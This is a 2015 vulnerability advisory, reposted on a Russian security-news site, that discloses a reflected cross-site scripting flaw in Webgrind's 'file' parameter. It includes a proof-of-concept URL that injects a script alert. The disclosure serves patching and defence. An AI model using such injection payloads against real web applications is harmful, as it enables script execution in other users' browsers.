Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Xloner v3.1.2 wordpress plugin authenticated command execution and XSS

  CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted Contact Form Wordpress Plugin v1.0.4

  AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability

  Symphony CMS 2.6.2

From:hyp3rlinx_(at)_gmail.com <hyp3rlinx_(at)_gmail.com>
Date:8 июня 2015 г.
Subject:Webgrind XSS vulnerability



Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt

Vendor:
https://github.com/jokkedk/webgrind

Product:
Webgrind is a Xdebug Profiling Web Frontend in PHP.

Advisory Information:
=====================================================
Webgrind is vulnerable to cross site scripting attacks.

Exploit code:
==============
http://localhost/webgrind/index.
php?op=fileviewer&file=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E

Disclosure Timeline:
==================================

Vendor Notification  May 19, 2015
May 20, 2015: Public Disclosure


Severity Level:
===============
Med

Description:
============

Request Method(s):
                               [+] GET

Vulnerable Product:
                               [+] Webgrind

Vulnerable Parameter(s):
                               [+] file=[XSS]

Affected Area(s):
                               [+] Current user.

==============================

(hyp3rlinx)

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород